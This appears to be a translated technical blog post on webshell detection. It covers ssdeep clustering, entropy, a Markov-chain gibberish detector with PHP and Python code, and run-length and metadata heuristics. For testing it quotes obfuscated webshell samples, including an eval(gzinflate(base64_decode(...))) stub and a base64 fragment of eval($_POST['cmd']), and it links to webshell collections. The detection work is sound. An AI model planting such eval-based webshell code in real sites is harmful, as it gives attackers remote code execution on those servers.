3) DDoS trojans
4) webshell trojans inserted into normal site files
5) SEO trojans
6) normal site files
2. Use a slimmer, more accurate webshell rule set: drop the scoring mechanism for rule hits and switch to precise regex rules with only two outcomes
1) yes_webshell
2) not_webshell
3. Optimize the ssdeep fuzzy-hash clustering decision along the lines of the k-nearest-neighbour algorithm
1) Cluster the sample under test against "YES_WEBSHELL" and "NOT_WEBSHELL" separately
2) Compute the "fuzzy score" (essentially a mathematical distance) against each class, then take the arithmetic mean of each, which gives the relative distance of the sample under test to the two classes
0x3: Where ssdeep needs improvement
When ssdeep is used on one-line webshells it frequently reports
ssdeep: Did not process files large enough to produce meaningful results
This is because ssdeep's piecewise fuzzy hash is in essence a block-oriented algorithm: it imposes a hard minimum length on the input, and if the text under test is shorter than the smallest "block" it cannot compute a hash. One possible workaround is to pad inputs shorter than a block before hashing (as the MD5 algorithm pads its input). Note that padding with a fixed filler makes every short file share most of its signature with every other padded short file, so such matches have to be scored separately from matches between full-size files.
7. Test of the demo prototype
0x1: Sample training method
Training the samples is essentially a two-cluster labelling pass over the sample set, and it needs human involvement
1. Training on normal files
1) Submit the normal sample files with curl
2) Label them as normal (a manual label applied through the verify endpoint)
http://112.124.6.139/ssdeep/index.php?filename=7055c8aaaf4ef6e0a98ce6b37b654799&action=verify&type=3
2. Training on malicious webshell files
1) Submit the malicious webshell files with curl
2) Label them as webshells (a manual label applied through the verify endpoint)
http://112.124.6.139/ssdeep/index.php?filename=7055c8aaaf4ef6e0a98ce6b37b654799&action=verify&type=2
0x2: Training set of normal site files
1. wordpress
2. discuz
3. ecshop
4. dedecms
5. phpmyadmin
6. thinkphp framework
// all historical versions, 70k valid .php files in total
Relevant Link:
http://blog.sina.com.cn/s/blog_78dfee090102vhth.html
http://discuz.ml/download
http://download.comsenz.com/DiscuzX/
http://www.dedecms.com/products/dedecms/downloads/
http://sourceforge.net/projects/phpmyadmin/files/phpMyAdmin/
https://code.google.com/p/thinkphp/downloads/list
0x3: Training set of malicious webshell files
1. The webshell sample collections on GitHub
2. Webshells collected day to day
// 1500+ in total
Relevant Link:
https://github.com/tennc/webshell
https://github.com/JohnTroony/php-webshells
0x4: Detection results
1. Sample library
1. Normal site files: 9190
2. Malicious webshell files: 341
2. Test files
1. webshell files: 64
2. normal site files: 436
3. Automatic verdicts of the demo engine
// the test samples were not part of the training set, i.e. the demo had no prior knowledge of the files under test
1. Webshell miss rate: the share of webshell files misjudged as normal. Miss rate: 1 / 64 = 1.5625%
SELECT * FROM `webshell_scan` WHERE `is_webshell` = 0 AND `is_check` = 0;
2. False-positive rate on normal files: the share of normal files misjudged as webshells. False-positive rate: 0 (false positives) / 436 (files in total) = 0%
SELECT * FROM `webshell_scan` WHERE `is_webshell` = 1 AND `is_check` = 0;
(64 webshells is a small test set: a single additional miss moves the miss rate by 1.6 points, so these figures are indicative rather than precise.)
8. Webshell recognition based on machine learning
If human experience can be expressed numerically to a machine, the machine can learn that experience. Features are the modelled form of human experience, and the abstract computation over features is that experience applied numerically to the sample under test. Feature engineering is an iterative loop: start with baseline features, run the classification algorithm and evaluate the result; if the result falls short, go back and add features that separate the classes better
0x1: Randomness and entropy
Shannon entropy expresses how random the distribution of characters in the text under test is: the more random, the higher the entropy. This check works well against encrypted and obfuscated webshells, because after encryption or base64 encoding a webshell looks like a string of random characters, as in the example below. Minified JavaScript, embedded images and compressed assets score high for the same reason, so entropy on its own produces false positives and is best combined with the other checks.
3.php
<?php
$pass2 = 'ec38fe2a8497e0a8d6d349b3533038cb';
$pass = 'd366d1753a59d6a078ca2ae087e99903';
eval(gzinflate(base64_decode('...')));   // the base64 payload is omitted here
?>
Entropy.php
<?php
/**
 * Computes the Shannon entropy of an array of tokens (aka symbols).
 */
class Entropy {
    public $tokens = array();       // the characters under test
    public $num_events = 0;         // number of characters in the sample
    public $token_freqs = array();  // frequency of each distinct character
    public $token_probs = array();  // share of each distinct character
    public $num_tokens = 0;         // number of distinct characters in the sample
    public $bits = 0.0;             // entropy in bits: how evenly the characters are distributed, larger = more even
    public $maxent = 0.0;           // maximum entropy log2(num_tokens): the entropy if every distinct character were equally frequent
    public $ratio = 0.0;            // bits / maxent, between 0 and 1

    function __construct($tokens) {
        $this->tokens = $tokens;
        $this->num_events = count($this->tokens);
        $this->token_freqs = $this->getTokenFrequencies();
        $this->num_tokens = count($this->token_freqs);
        $entropy = 0.0;
        foreach ($this->token_freqs as $token => $freq) {
            // share of this character in the whole sample
            $this->token_probs[$token] = $freq / $this->num_events;
            $entropy += $this->token_probs[$token] * log($this->token_probs[$token], 2);
        }
        $this->bits = -1.0 * $entropy;
        $this->maxent = log($this->num_tokens, 2);
        // a sample consisting of one distinct character has maxent 0; avoid dividing by zero
        $this->ratio = $this->maxent > 0 ? $this->bits / $this->maxent : 0.0;
    }

    function getTokenFrequencies() {
        for ($i = 0; $i < $this->num_events; $i++) {
            // count every byte value that occurs, not only a-z
            $key = $this->tokens[$i];
            $this->token_freqs[$key] = isset($this->token_freqs[$key]) ? $this->token_freqs[$key] + 1 : 1;
        }
        return $this->token_freqs;
    }
}
?>
clickstream_entropy.php
<?php
require_once "./Entropy.php";
//$tokens = array("h","n","p","s","h","n","h","a","h","p","h","s","h","n","p");
$tokens = str_split(file_get_contents("./3.php"), 1);
$e = new Entropy($tokens);
?>
<pre>
<?php print_r($e) ?>
</pre>
<p>
The Entropy of the source measured in bits is: <?php echo $e->bits ?>
</p>
Relevant Link:
http://en.wikipedia.org/wiki/Entropy_%28information_theory%29
http://www.codeforge.cn/article/191405
0x2: Readability check of strings with a Markov chain (Gibberish Detector)
Looking at normal script files next to transformed webshells, one notices that normal web scripts are written by programmers and every variable and string is "pronounceable", whereas a transformed webshell is usually "unpronounceable". "Pronounceable" has a more rigorous form called "gibberish detection": deciding whether a string can be read out in a human language (google, for instance, is not an English word but rolls off the tongue). Behind it is a Markov-chain model (the post calls it a hidden Markov chain; the model actually used is a plain first-order chain over letter transitions, nothing in it is hidden).
Applied to webshell detection the procedure is
1. Train the detection model as a Markov chain
2. Run the Markov-chain training, the goal being a 26 * 26 matrix of bigram (letter-to-letter) statistics, using
1) a base corpus: ordinary English prose
2) a positive corpus: the variables and strings from the token sequences of normal site scripts
3) a negative corpus: the variables and strings from the token sequences of malicious webshell scripts
3. Complete the training and derive the decision threshold: threshold
4. Build the token tree of the sample under test and extract the elements of the chosen types, namely
1) variables
2) strings
5. Run "gibberish detection" over the extracted variables and strings
6. Classify the detection results to obtain the clustering result
7. If more than half of the words are readable (the post phrases this as words beginning with a vowel), judge the file normal, otherwise a webshell
big.txt (the base corpus used for training)
The Project Gutenberg EBook of The Adventures of Sherlock Holmes by Sir Arthur Conan Doyle (#15 in our series by Sir Arthur Conan Doyle) Copyright laws are changing all over the world. Be sure to check the copyright laws for your country before downloading or redistributing this or any other Project Gutenberg eBook. This header should be the first thing seen when viewing this Project Gutenberg file. Please do not remove it. Do not change or edit the header without written permission. Please read the "legal small print," and other information about the eBook and Project Gutenberg at the bottom of this file. Included is important information about your specific rights and restrictions in how the file may be used. ..
good.txt (the positive corpus used for training)
rob two models some long sentence, might suck? Project Gutenberg a b c
bad.txt (the negative corpus used for training)
zxcvwerjasc nmnjcviburili,<> zxcvnadtruqe ertrjiloifdfyyoiu grty iuewdiivjh
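The training and scoring steps above (letter-transition matrix from the base corpus, threshold from the good and bad lists, majority vote over a file's identifiers), as an added example in Python; this is not the post's own code. The three corpora are short constructed stand-ins for big.txt, good.txt and bad.txt, the alphabet is the 26 letters plus the space character (the 27 x 27 matrix that the serialized matrix.txt actually holds), and add-one smoothing keeps unseen transitions at a small non-zero probability instead of minus infinity.

```python
import math
from typing import Dict, List, Sequence

ALPHABET = "abcdefghijklmnopqrstuvwxyz "
INDEX: Dict[str, int] = {ch: i for i, ch in enumerate(ALPHABET)}

# Constructed corpora (stand-ins for big.txt, good.txt and bad.txt).
BIG_TXT = (
    "the quick brown fox jumps over the lazy dog the quick brown fox jumps over the lazy dog "
    "it was the best of times it was the worst of times it was the age of wisdom "
    "please read the legal small print and other information about the ebook "
    "this header should be the first thing seen when viewing this file "
    "the user name and the file name are checked before the request is handled "
)
GOOD_TXT = ["the lazy dog", "read the legal print", "the first request", "the user name"]
BAD_TXT = ["zxcvwerjasc", "nmnjcviburili", "zxcvnadtruqe", "ertrjiloifdfyyoiu"]


def normalize(text: str) -> str:
    """Lower-case and keep only letters and spaces; everything else is dropped."""
    return "".join(ch for ch in text.lower() if ch in INDEX)


def train(corpus: str, smoothing: int = 1) -> List[List[float]]:
    """Return log P(next | current) as a 27x27 matrix, add-k smoothed so that a
    transition never seen in the corpus still has a small probability."""
    counts = [[smoothing] * len(ALPHABET) for _ in ALPHABET]
    text = normalize(corpus)
    for a, b in zip(text, text[1:]):
        counts[INDEX[a]][INDEX[b]] += 1
    return [[math.log(c / sum(row)) for c in row] for row in counts]


def avg_transition_prob(text: str, matrix: Sequence[Sequence[float]]) -> float:
    """Mean log-probability of the letter transitions in text; higher = more readable."""
    text = normalize(text)
    pairs = list(zip(text, text[1:]))
    if not pairs:
        return 0.0
    return sum(matrix[INDEX[a]][INDEX[b]] for a, b in pairs) / len(pairs)


def pick_threshold(matrix: Sequence[Sequence[float]], good: Sequence[str], bad: Sequence[str]) -> float:
    """Midpoint between the worst-scoring readable string and the best-scoring
    gibberish string.  If those two overlap the training data is not separable
    and the threshold should not be trusted."""
    lo = min(avg_transition_prob(s, matrix) for s in good)
    hi = max(avg_transition_prob(s, matrix) for s in bad)
    return (lo + hi) / 2


MATRIX = train(BIG_TXT)
THRESHOLD = pick_threshold(MATRIX, GOOD_TXT, BAD_TXT)


def is_gibberish(text: str) -> bool:
    return avg_transition_prob(text, MATRIX) <= THRESHOLD


def file_looks_obfuscated(identifiers: Sequence[str]) -> bool:
    """Step 7 above: flag the file when fewer than half of its variable names
    and strings read as language (a plain majority vote)."""
    readable = sum(1 for s in identifiers if not is_gibberish(s))
    return readable * 2 < len(identifiers)


if __name__ == "__main__":
    for s in ["the quick brown fox", "zqxjvkzpfq", "pwd", "e7xue"]:
        print(s, round(avg_transition_prob(s, MATRIX), 2), is_gibberish(s))
```

Two caveats follow directly from the model: a corpus this small makes any rare but legitimate bigram look like gibberish, so the real thing needs a corpus the size of big.txt, and short identifiers (two or three letters) contain too few transitions to score reliably and are better excluded from the vote.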
matrix.txt (the transition matrix produced by training, stored with PHP serialize(): a 27 * 27 array of log-probabilities, one row per letter a-z plus the space character, which is why the dump has a:27 rather than the 26 * 26 mentioned above; only the first row is reproduced here, the rest of the dump is truncated in the source)
a:2:{s:6:"matrix";a:27:{i:0;a:27:{i:0;d:-8.5691373129308985;i:1;d:-3.9369332597631863;i:2;d:-3.2206701626973908;i:3;d:-3.0482479869676102;i:4;d:-6.0522790633362966;i:5;d:-4.6995609977500097;i:6;d:-3.9941585968087816;i:7;d:-6.7104072175966607;i:8;d:-3.2453041060602184;i:9;d:-7.0607402550101082;i:10;d:-4.5122833596242966;i:11;d:-2.4997201529644935;i:12;d:-3.6426367816409662;i:13;d:-1.5707462805725019;i:14;d:-7.9784688016538912;i:15;d:-3.8936418102220776;i:16;d:-9.8219002814262666;i:17;d:-2.3025283782801376;i:18;d:-2.3483664253823981;i:19;d:-1.9448651421947813;i:20;d:-4.5391581266637013;i:21;d:-3.871849760115083;i:22;d:-4.7063591204638309;i:23;d:-6.5603133384650167;i:24;d:-3.6497253232076332;i:25;d:-6.6419543029262833;i:26;d:-2.7134701747591117;} ...
13;i:5;d:-7.1724024598857836;i:6;d:-8.4784324575626382;i:7;d:-1.1074718716074006;i:8;d:-2.3662341497302157;i:9;d:-10.456777882371107;i:10;d:-9.6895227296574387;i:11;d:-4.4185398552495441;i:12;d:-6.0323919738580827;i:13;d:-7.21960886445558;i:14;d:-2.3367153961191565;i:15;d:-8.1619148354709701;i:16;d:-10.719142146838596;i:17;d:-3.4624215669877803;i:18;d:-3.6797447588047447;i:19;d:-4.0251990917417855;i:20;d:-3.9002180815630756;i:21;d:-9.5559913370329159;i:22;d:-5.18259559155831;i:23;d:-10.131355481936478;i:24;d:-4.2047257961667839;i:25;d:-7.9847746374190134;i:26;d:-1.5835253210583506;}i:20;a:27:{i:0;d:-3.6907063474960813;i:1;d:-3.7341336409280999;i:2;d:-3.2454721262149633;i:3;d:-4.0206087126298451;i:4;d:-3.2812979786880589;i:5;d:-5.0172437658127595;i:6;d:-3.1933271849501734;i:7;d:-7.7963898885987;i:8;d:-3.7311188662600099;i:9;d:-9.3545345066452494;i:10;d:-6.2082293746118848;i:11;d:-2.257675168572427;i:12;d:-3.4112977818505237;i:13;d:-2.089862646254399;i:14;d:-6.0964379686237677;i:15;d:-3.1007056950697769;i:16;d:-8.9490693985370857;i:17;d:-1.905375903432984;i:18;d:-1.9722545836234537;i:19;d:-1.9648676140617645;i:20;d:-9.2744917989717131;i:21;d:-6.7831953510849425;i:22;d:-9.3545345066452494;i:23;d:-7.3176525793842098;i:24;d:-7.3735330377786665;i:25;d:-5.2671586137392428;i:26;d:-3.2700350935700784;}i:21;a:27:{i:0;d:-2.4677551327310105;i:1;d:-8.4660147229718206;i:2;d:-8.5613249027761462;i:3;d:-7.8681777222162008;i:4;d:-0.5192363285514866;i:5;d:-8.5613249027761462;i:6;d:-8.2989606383086549;i:7;d:-8.4660147229718206;i:8;d:-1.7429474349452256;i:9;d:-8.4660147229718206;i:10;d:-7.919471016603751;i:11;d:-5.4433749964979059;i:12;d:-8.5613249027761462;i:13;d:-4.566800675836256;i:14;d:-2.7892609207035393;i:15;d:-8.5613249027761462;i:16;d:-8.5613249027761462;i:17;d:-6.2687901456356014;i:18;d:-4.407140340198028;i:19;d:-7.9735382378740267;i:20;d:-6.2891990172668084;i:21;d:-8.3790033459821913;i:22;d:-8.030696651713976;i:23;d:-8.4660147229718206;i:24;d:-5.2581079294741944;i:25;d:-8.5613
249027761462;i:26;d:-3.1228109057348257;}i:22;a:27:{i:0;d:-1.596798460957614;i:1;d:-7.6001421705956735;i:2;d:-7.6409641651159284;i:3;d:-5.3446486851354784;i:4;d:-1.8921021056868312;i:5;d:-6.8393363415619133;i:6;d:-8.1109677943616649;i:7;d:-1.6228272590921338;i:8;d:-1.7628783045649916;i:9;d:-8.8731078464085602;i:10;d:-7.0013056695069693;i:11;d:-5.4671598619878079;i:12;d:-8.1799606658486148;i:13;d:-3.2183655671770013;i:14;d:-2.5242186364713008;i:15;d:-8.293289351155618;i:16;d:-9.209580083029774;i:17;d:-4.5700084703243498;i:18;d:-4.2425484264156506;i:19;d:-5.6542320215403601;i:20;d:-7.560921457442392;i:21;d:-9.209580083029774;i:22;d:-7.3074725566328533;i:23;d:-9.209580083029774;i:24;d:-6.8774361877941841;i:25;d:-9.0272585262358191;i:26;d:-2.172728230713227;}i:23;a:27:{i:0;d:-2.2547809680334239;i:1;d:-6.8982098661386058;i:2;d:-2.0276032166460531;i:3;d:-6.4927447580304412;i:4;d:-2.4626424645366942;i:5;d:-5.8334991291461771;i:6;d:-6.8982098661386058;i:7;d:-4.3104458309108979;i:8;d:-2.0731012597852527;i:9;d:-6.8982098661386058;i:10;d:-6.8982098661386058;i:11;d:-6.4282062368928701;i:12;d:-6.7158883093446509;i:13;d:-6.8982098661386058;i:14;d:-4.4558628307694015;i:15;d:-1.4955324842663262;i:16;d:-6.3675816150764355;i:17;d:-4.6364467676648147;i:18;d:-5.7668077546475054;i:19;d:-1.8703897472882491;i:20;d:-4.3724812218303502;i:21;d:-4.3487646952130339;i:22;d:-6.802899686334281;i:23;d:-4.4734071404203108;i:24;d:-5.175443268397502;i:25;d:-6.8982098661386058;i:26;d:-2.5557039896270073;}i:24;a:27:{i:0;d:-3.8728743535324379;i:1;d:-6.0798383375596803;i:2;d:-5.6059562289853746;i:3;d:-6.1495716755743555;i:4;d:-2.9181087352006836;i:5;d:-5.8331401898365893;i:6;d:-6.9987231046108827;i:7;d:-7.3171768357294171;i:8;d:-3.8266394412494407;i:9;d:-8.857621876676566;i:10;d:-7.4507082283539399;i:11;d:-4.7453828245779146;i:12;d:-4.4478584870310849;i:13;d:-5.4481256921997154;i:14;d:-2.2255103117197566;i:15;d:-4.7372306055163644;i:16;d:-9.0399434334705209;i:17;d:-5.7515415459537094;i:18;d:-3.1326760451
63294;i:19;d:-4.2302010817536546;i:20;d:-7.0384634332603966;i:21;d:-7.6536490723506301;i:22;d:-6.2305407381080231;i:23;d:-7.7049423667381802;i:24;d:-8.1644746961166206;i:25;d:-7.731610613820342;i:26;d:-0.38178901910364238;}i:25;a:27:{i:0;d:-2.5311795993314572;i:1;d:-6.0031460518818198;i:2;d:-5.9078358720774951;i:3;d:-4.6948132322316409;i:4;d:-0.92922301854964551;i:5;d:-5.9078358720774951;i:6;d:-6.0031460518818198;i:7;d:-3.199785670975285;i:8;d:-2.3395844057521735;i:9;d:-6.0031460518818198;i:10;d:-5.6666738152606069;i:11;d:-3.8868905370792679;i:12;d:-4.0016660516716955;i:13;d:-5.0098942788715366;i:14;d:-1.7362497244615696;i:15;d:-6.0031460518818198;i:16;d:-6.0031460518818198;i:17;d:-6.0031460518818198;i:18;d:-5.8208244950878649;i:19;d:-5.9078358720774951;i:20;d:-3.1183453390351104;i:21;d:-5.6666738152606069;i:22;d:-5.9078358720774951;i:23;d:-6.0031460518818198;i:24;d:-4.5680615265924969;i:25;d:-3.7731316517226094;i:26;d:-3.1699327078256037;}i:26;a:27:{i:0;d:-2.154456318300654;i:1;d:-3.1320289092329041;i:2;d:-3.2042402732214348;i:3;d:-3.5547759660800491;i:4;d:-3.8320798875631166;i:5;d:-3.2625149066892174;i:6;d:-4.1318426237305275;i:7;d:-2.7847122791384975;i:8;d:-2.7534204117779435;i:9;d:-5.68607428491371;i:10;d:-5.2715182051042939;i:11;d:-3.7797926294683339;i:12;d:-3.3524684982622079;i:13;d:-3.8123859357235683;i:14;d:-2.6445324753284249;i:15;d:-3.3676057306367433;i:16;d:-6.2378725360564378;i:17;d:-3.6809218434868227;i:18;d:-2.7030074975159986;i:19;d:-1.86142386740762;i:20;d:-4.4723885304095425;i:21;d:-4.9186968304815517;i:22;d:-2.8042850405884527;i:23;d:-7.7839495282823838;i:24;d:-4.7020395584873409;i:25;d:-8.486442571260568;i:26;d:-3.2910629924454486;}}s:9:"threshold";d:0.027138686673887656;}
Preliminary sample training
// Sample training
public static function train($big_text_file, $good_text_file, $bad_text_file, $lib_path)
{
    if (is_file($big_text_file) === false || is_file($good_text_file) === false || is_file($bad_text_file) === false) {
        return false;
    }

    // self::$_accepted_characters = "abcdefghijklmnopqrstuvwxyz " : the 26 letters plus
    // the space, which is why the serialized matrix above has 27 rows of 27 entries
    $k = strlen(self::$_accepted_characters);

    /* $pos = array('a' => 0, 'b' => 1, 'c' => 2, ...); */
    $pos = array_flip(str_split(self::$_accepted_characters));

    // Assume we have seen 10 of each character pair. This acts as a kind of
    // prior or smoothing factor. This way, if we see a character transition
    // live that we've never observed in the past, we won't assume the entire
    // string has 0 probability.
    $log_prob_matrix = array();
    $range = range(0, count($pos) - 1);
    // build the square transition-count matrix: one row and one column per accepted character
    foreach ($range as $index1) {
        $array = array();
        foreach ($range as $index2) {
            $array[$index2] = 10;
        }
        $log_prob_matrix[$index1] = $array;
    }

    // Count transitions from big text file, taken
    // from http://norvig.com/spell-correct.html
    $lines = file($big_text_file);
    foreach ($lines as $line) {
        // normalise the training sample: lowercase it and keep only the accepted characters
        $filtered_line = str_split(self::_normalise($line));
        $a = false;
        foreach ($filtered_line as $b) {
            if ($a !== false) {
                // count the adjacent-character (bigram) transition a -> b;
                // transitions never cross a line boundary
                $log_prob_matrix[$pos[$a]][$pos[$b]] += 1;
            }
            $a = $b;
        }
    }
    // free memory
    unset($lines, $filtered_line);

    // Normalize the counts so that they become log probabilities.
    // We use log probabilities rather than straight probabilities to avoid
    // numeric underflow issues with long texts.
    // This contains a justification:
    // http://squarecog.wordpress.com/2009/01/10/dealing-with-underflow-in-joint-probability-calculations/
    foreach ($log_prob_matrix as $i => $row) {
        // total number of transitions leaving character $i (including the prior counts)
        $s = (float) array_sum($row);
        foreach ($row as $col => $count) {
            // row-normalise: log P(b | a) = log(count(a, b) / sum over b of count(a, b))
            $log_prob_matrix[$i][$col] = log($count / $s);
        }
    }

    // Find the probability of generating a few arbitrarily chosen good and
    // bad phrases.
    $good_lines = file($good_text_file);
    $good_probs = array();
    foreach ($good_lines as $line) {
        array_push($good_probs, self::_averageTransitionProbability($line, $log_prob_matrix));
    }
    $bad_lines = file($bad_text_file);
    $bad_probs = array();
    foreach ($bad_lines as $line) {
        array_push($bad_probs, self::_averageTransitionProbability($line, $log_prob_matrix));
    }

    // Assert that we actually are capable of detecting the junk.
    $min_good_probs = min($good_probs);
    $max_bad_probs = max($bad_probs);
    if ($min_good_probs <= $max_bad_probs) {
        return false;
    }

    // And pick a threshold halfway between the worst good and best bad inputs.
    $threshold = ($min_good_probs + $max_bad_probs) / 2;

    // save matrix
    return file_put_contents($lib_path, serialize(array(
        'matrix'    => $log_prob_matrix,
        'threshold' => $threshold,
    ))) > 0;
}
Obtaining the classifier threshold $threshold
//And pick a threshold halfway between the worst good and best bad inputs. $threshold = ($min_good_probs + $max_bad_probs) / 2;
Testing a suspicious sample
public static function test($text, $lib_path, $raw = false)
{
    if (file_exists($lib_path) === false) {
        // TODO throw error?
        return -1;
    }
    // The library file is written by train() and must be trusted: unserialize()
    // on attacker-controlled data is unsafe (PHP object injection).
    $trained_library = unserialize(file_get_contents($lib_path));
    if (is_array($trained_library) === false) {
        // TODO throw error?
        return -1;
    }
    $value = self::_averageTransitionProbability($text, $trained_library['matrix']);
    if ($raw === true) {
        return $value;
    }
    // at or below the threshold the text is classified as gibberish (true);
    // note the mixed return types (-1 / true / false): callers must compare with ===
    if ($value <= $trained_library['threshold']) {
        return true;
    }
    return false;
}
Markov-chain gibberish scoring of webshells is, at bottom, a two-class separation driven by a single threshold. The transition matrix (the "predicted bigram sequence" model) is built from the base corpus only. The positive corpus (readable lines) and the negative corpus (gibberish lines) are then scored against that matrix, and the threshold is placed halfway between the lowest-scoring readable line and the highest-scoring gibberish line; the good and bad corpora are not averaged into the matrix. The score of a suspicious sample is its average transition probability under the matrix (the exponent of the mean log transition probability, which is why the stored threshold 0.0271 above is a probability and not a log), and the decision is:
1. If the sample's score is at or below the threshold, it is classified as gibberish, i.e. a random-looking string of the kind an encoded or obfuscated webshell produces (test() returns true)
2. If the score is above the threshold, it is classified as a readable, natural-language-like string (test() returns false)
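The same train / threshold / test pipeline in Python, added here as a worked example; it is not the page's PHP library (buggedcom's Gibberish-Detector-PHP) but follows its steps: a prior count of 10 per transition, row-normalised log probabilities over 26 letters plus the space (the 27 x 27 matrix seen in the dump), a score that is the exponent of the mean log transition probability, and a threshold halfway between the worst readable line and the best gibberish line. The training corpus, the good/bad lines and all function names are constructed for the example.

```python
"""Character-bigram Markov gibberish detector (added example, not from the page).
The corpus and the good/bad lines are constructed; a real deployment trains on a
large plain-text corpus such as Norvig's big.txt, as the PHP code's comment says."""
import math

ACCEPTED = "abcdefghijklmnopqrstuvwxyz "   # 26 letters + space: a 27 x 27 matrix
POS = {c: i for i, c in enumerate(ACCEPTED)}
PRIOR = 10.0                                # every pair is assumed seen 10 times (smoothing)


def normalise(line):
    """Lowercase the line and drop every character outside ACCEPTED."""
    return "".join(c for c in line.lower() if c in ACCEPTED)


def bigrams(line):
    """Adjacent character pairs of the normalised line."""
    s = normalise(line)
    return zip(s, s[1:])


def train_matrix(corpus_lines):
    """Row-normalised log P(b | a) over the corpus; transitions never cross a line."""
    n = len(ACCEPTED)
    counts = [[PRIOR] * n for _ in range(n)]
    for line in corpus_lines:
        for a, b in bigrams(line):
            counts[POS[a]][POS[b]] += 1
    matrix = []
    for row in counts:
        total = sum(row)
        matrix.append([math.log(c / total) for c in row])
    return matrix


def avg_transition_prob(line, matrix):
    """exp of the mean log transition probability along the line: a probability,
    which is why the stored threshold on this page (0.027) is not a log value."""
    log_prob, n = 0.0, 0
    for a, b in bigrams(line):
        log_prob += matrix[POS[a]][POS[b]]
        n += 1
    return math.exp(log_prob / (n or 1))


def row_probability_sum(matrix, row_index):
    """Sanity check: the probabilities in one row must add up to 1."""
    return sum(math.exp(v) for v in matrix[row_index])


def train(corpus_lines, good_lines, bad_lines):
    """(matrix, threshold), or None when the good and bad lines do not separate."""
    matrix = train_matrix(corpus_lines)
    min_good = min(avg_transition_prob(l, matrix) for l in good_lines)
    max_bad = max(avg_transition_prob(l, matrix) for l in bad_lines)
    if min_good <= max_bad:
        return None
    return matrix, (min_good + max_bad) / 2


def is_gibberish(text, model):
    """True when the text scores at or below the threshold (the PHP test() rule)."""
    matrix, threshold = model
    return avg_transition_prob(text, matrix) <= threshold


# --- constructed sample data (not real corpora) ---------------------------------
CORPUS = [
    "the web server reads the request and returns the page to the client",
    "the user sends a request and the server returns the data",
    "this function reads the file and returns the list of names",
    "the client sends the name of the user to the server",
    "the server writes the data to the file on the disk",
    "each request contains the name of the page and the data",
    "the application reads the list of users from the file",
    "the main function of the application returns the page",
    "the server logs the name of the client and the time of the request",
    "the page contains the list of files on the server",
    "a user can read the data and write the data to the file",
    "the function returns the time and the name of the server",
]
GOOD = [
    "the server returns the page to the client",
    "the user reads the file and the data",
    "this function returns the name of the user",
]
BAD = [
    "xkqzvjwpfxkqzvj",                   # random consonant stream
    "ZXZhbCgkX1BPU1RbJ2NtZCddKQ",        # base64-looking blob, as in an encoded webshell
    "mnbvcxzlkjhgfdsapoiuytrewq",        # keyboard mash
]

MODEL = train(CORPUS, GOOD, BAD)

if __name__ == "__main__":
    matrix, threshold = MODEL
    print("threshold = %.4f" % threshold)
    for s in GOOD + BAD + ["zqxjzqxjzqxj", "the user reads the page"]:
        print("%-32s %.4f gibberish=%s" % (s, avg_transition_prob(s, matrix), is_gibberish(s, MODEL)))
```

With a corpus this small most rows are dominated by the prior, so every unseen transition scores close to 10/270; the separation still holds because readable lines are built from frequent bigrams. This is also the weakness the text goes on to describe: a webshell is code, not prose, and once the "readable" side of the split is also code the two classes move together.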
Applying the Markov chain to real webshell detection runs into the following difficulties:
1. The feature dimensions to extract from the positive samples (normal site files) and the negative samples (malicious webshell files) are hard to pin down. Markov-chain gibberish scoring works well for domain names and for checking whether an article is genuine text, but a webshell is a script file, a sequence of discrete formulas (code). In my experiments I extracted two dimensions, variable names and string literals, and ran the Markov-chain scoring on those.
2. In practice the Markov scores computed for normal site files and for malicious webshells came out very close, and sometimes even inverted (the two classes overlapped in reverse), which makes separating them impossible.
Relevant Link:
http://stackoverflow.com/questions/4672822/how-to-test-if-a-string-contains-gibberish-in-php
https://github.com/buggedcom/Gibberish-Detector-PHP
https://github.com/rrenaud/Gibberish-Detector
http://baike.baidu.com/view/340221.htm
http://zh.wikipedia.org/zh-cn/%E9%A9%AC%E5%B0%94%E5%8F%AF%E5%A4%AB%E9%93%BE
http://en.wikipedia.org/wiki/Precision_and_recall
http://drops.wooyun.org/tips/6220
0x3: Consecutive vs. dispersed characters
Looking further, the randomness of a malformed webshell also shows up in the runs of consecutive letters and digits. A webshell that has been transformed or encrypted generally does not contain long runs of digits or the same letter repeated. And because consonants far outnumber vowels in the alphabet, a transformed webshell is more likely to contain long runs of consonants, whereas the code in legitimate site files, written to be pronounceable, mostly alternates vowels and consonants.
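The run-length heuristics above turned into per-file features, as an added example (not code from the page). The thresholds in looks_obfuscated() and the two snippets, one ordinary PHP and one carrying a base64-style payload, are constructed for the example.

```python
"""Run-length features for malformed-webshell screening (added example, not from the page)."""
import re

CONSONANTS = "bcdfghjklmnpqrstvwxyz"   # y counted as a consonant


def longest_run(text, pattern):
    """Length of the longest match of `pattern` in `text` (0 when it never matches)."""
    return max((m.end() - m.start() for m in re.finditer(pattern, text)), default=0)


def vowel_ratio(text):
    """Share of the letters that are vowels; a random letter stream sits near 5/26."""
    letters = [c for c in text.lower() if c.isalpha()]
    if not letters:
        return 0.0
    return sum(c in "aeiou" for c in letters) / len(letters)


def run_features(text):
    """The features the text above describes, computed over the lower-cased file body."""
    t = text.lower()
    return {
        "digit_run": longest_run(t, r"[0-9]+"),              # longest run of consecutive digits
        "same_letter_run": longest_run(t, r"([a-z])\1+"),    # longest run of one repeated letter
        "consonant_run": longest_run(t, "[%s]+" % CONSONANTS),
        "vowel_ratio": round(vowel_ratio(t), 3),
    }


def looks_obfuscated(text, max_consonant_run=6, min_vowel_ratio=0.25):
    """Assumed decision rule: a long consonant run or a vowel-poor body is suspicious."""
    f = run_features(text)
    return f["consonant_run"] >= max_consonant_run or f["vowel_ratio"] < min_vowel_ratio


# constructed samples
NORMAL = (
    "<?php\nfunction load_user($id) {\n"
    "    return $db->query('select name from users where id = ?', [$id]);\n}\n"
)
OBFUSCATED = (
    "<?php eval(gzinflate(base64_decode("
    "'eJxLzs8rLilKLNHWz8hPzy9KLYrPzE1MzyzNS1fQ0dXVBgBqXwi9'))); ?>"
)

if __name__ == "__main__":
    for label, body in (("normal", NORMAL), ("obfuscated", OBFUSCATED)):
        print(label, run_features(body), looks_obfuscated(body))
```

The consonant run is the strongest of the four here: the payload blob reaches nine consonants in a row while readable PHP stays at three, and the vowel share of the blob falls to roughly a fifth. As with the Markov score, treat these as weights to feed into the overall file score rather than a verdict on their own: a minified JavaScript bundle or a hex dump in a legitimate file will trip the same rules.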
0x2: ID3 decision tree
Relevant Link:
http://www.xuebuyuan.com/1482392.html
9. Suspicion scoring based on file metadata
When judging whether a file is a webshell, the metadata of the file and of its directory can serve as evidence of suspicion alongside the features of the text itself:
1. Whether a file's metadata, including 1) creation time 2) modification time, differs greatly from that of the other files in the same directory; if so, weight the file's score up (raising the probability that it is judged to be a webshell)
